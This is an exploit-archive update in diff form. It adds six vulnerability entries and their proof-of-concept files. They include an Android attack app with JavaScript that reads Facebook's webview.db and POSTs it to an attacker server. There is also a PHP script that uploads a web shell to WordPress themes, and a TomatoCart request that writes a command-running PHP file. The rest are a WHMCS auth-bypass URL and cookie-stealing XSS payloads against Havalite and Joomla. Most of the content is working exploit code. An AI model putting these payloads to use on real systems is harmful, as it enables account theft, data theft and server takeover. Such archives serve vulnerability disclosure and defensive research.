DB: 2015-09-14

6 new exploits

files.csv

@@ -34465,3 +34465,9 @@ id,file,description,date,author,platform,type,port
 38162,platforms/php/webapps/38162.txt,"osTicket tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0
 38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload Vulnerability",2013-01-03,"Sammy FORGIT",php,webapps,0
 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security Vulnerability",2013-01-03,ZhaoChunsheng,hardware,remote,0
+38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 Insecure Cookie Authentication Bypass Vulnerability",2012-12-31,Agd_Scorp,php,webapps,0
+38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload Vulnerability",2013-01-04,JingoBD,php,webapps,0
+38168,platforms/php/webapps/38168.txt,"TomatoCart 'json.php' Security Bypass Vulnerability",2013-01-04,"Aung Khant",php,webapps,0
+38169,platforms/php/webapps/38169.txt,"Havalite CMS 'comment' Parameter HTML Injection Vulnerability",2013-01-06,"Henri Salo",php,webapps,0
+38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure Vulnerability",2013-01-07,"Takeshi Terada",android,remote,0
+38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0

platforms/android/remote/38170.txt

@@ -0,0 +1,92 @@
+source: http://www.securityfocus.com/bid/57173/info
+
+Facebook for Android is prone to an information-disclosure vulnerability.
+
+Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
+
+Facebook for Android 1.8.1 is vulnerable; other versions may also be affected.
+
+++++++ Attacker's app (activity) ++++++
+  
+  // notice: for a successful attack, the victim user must be logged-in
+  // to Facebook in advance.
+  public class AttackFacebook extends Activity {
+
+      // package name of Facebook app
+      static final String FB_PKG = "com.facebook.katana";
+  
+      // LoginActivity of Facebook app
+      static final String FB_LOGIN_ACTIVITY
+           = FB_PKG + ".LoginActivity";
+  
+      // FacebookWebViewActivity of Facebook app
+      static final String FB_WEBVIEW_ACTIVITY
+           = FB_PKG + ".view.FacebookWebViewActivity";
+  
+      @Override
+      public void onCreate(Bundle bundle) {
+          super.onCreate(bundle);
+          attack();
+      }
+  
+      // main method
+      public void attack() {
+          // create continuation_intent to call FacebookWebViewActivity.
+          Intent contIntent = new Intent();
+          contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
+          // URL pointing to malicious local file.
+          // FacebookWebViewActivity will load this URL into its WebView.
+          contIntent.putExtra("url", "file:///sdcard/attack.html");
+  
+          // create intent to be sent to LoginActivity.
+          Intent intent = new Intent();
+          intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
+          intent.putExtra("login_redirect", false);
+  
+          // put continuation_intent into extra data of the intent.
+          intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
+  
+          // call LoginActivity
+          this.startActivity(intent);
+      }
+  }
+
+  ++++++ Attacker's HTML/JavaScript file ++++++
+  
+  <!--
+  attacker's app should put this file to /sdcard/attack.html in advance
+  -->
+ <html>
+  <body onload="doAttack()">
+  <h1>attack.html</h1>
+  <script>
+  // file path to steal. webview.db can be a good target for attackers
+  // because it contains cookies, formdata etc.
+  var target = "file:///data/data/com.facebook.katana/databases/webview.db";
+  
+  // get the contents of the target file by XHR
+  function doAttack() {
+      var xhr1 = new XMLHttpRequest();
+      xhr1.overrideMimeType("text/plain; charset=iso-8859-1");
+      xhr1.open("GET", target);
+      xhr1.onreadystatechange = function() {
+          if (xhr1.readyState == 4) {
+              var content = xhr1.responseText;
+              // send the content of the file to attacker's server
+              sendFileToAttackerServer(content);
+              // for debug
+              document.body.appendChild(document.createTextNode(content));
+          }
+      };
+      xhr1.send();
+  }
+  
+  // Send the content of target file to the attacker's server
+  function sendFileToAttackerServer(content) {
+      var xhr2 = new XMLHttpRequest();
+      xhr2.open("POST", "http://www.example.jp/";);
+      xhr2.send(encodeURIComponent(content));
+  }
+  </script>
+  </body>
+  </html>

platforms/php/webapps/38166.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57145/info
+
+WHMCS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+WHMCS 5.0 and 5.1 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} 

platforms/php/webapps/38167.php

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/57152/info
+
+Multiple themes from WPScientist for WordPress are prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+The following themes are vulnerable:
+
+Lightspeed version 1.1.2
+Eptonic version 1.4.3
+Nuance version 1.2.3 
+
+=================== EXPLOIT====================
+<?php
+
+$uploadfile="bangla.php"; 
+$ch =
+curl_init("http://www.example.com/wordpress/VALUMS_UPLOADER_PATH/php.php");
+curl_setopt($ch, CURLOPT_POST, true); 
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('qqfile'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access: http://www.example.com/wp-content/uploads/2013/01/bangla.php

platforms/php/webapps/38168.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/57156/info
+
+TomatoCart is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.
+
+TomatoCart versions 1.1.5 and 1.1.8 are vulnerable. 
+
+POST /admin/json.php HTTP/1.1
+Host: localhost
+Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 195
+
+module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?> 

platforms/php/webapps/38169.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57169/info
+
+Havalite CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Havalite CMS 1.1.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E 

platforms/php/webapps/38171.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/57190/info
+
+
+The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Incapsula 1.4.6_b and prior are vulnerable. 
+
+http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>
+
+http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script>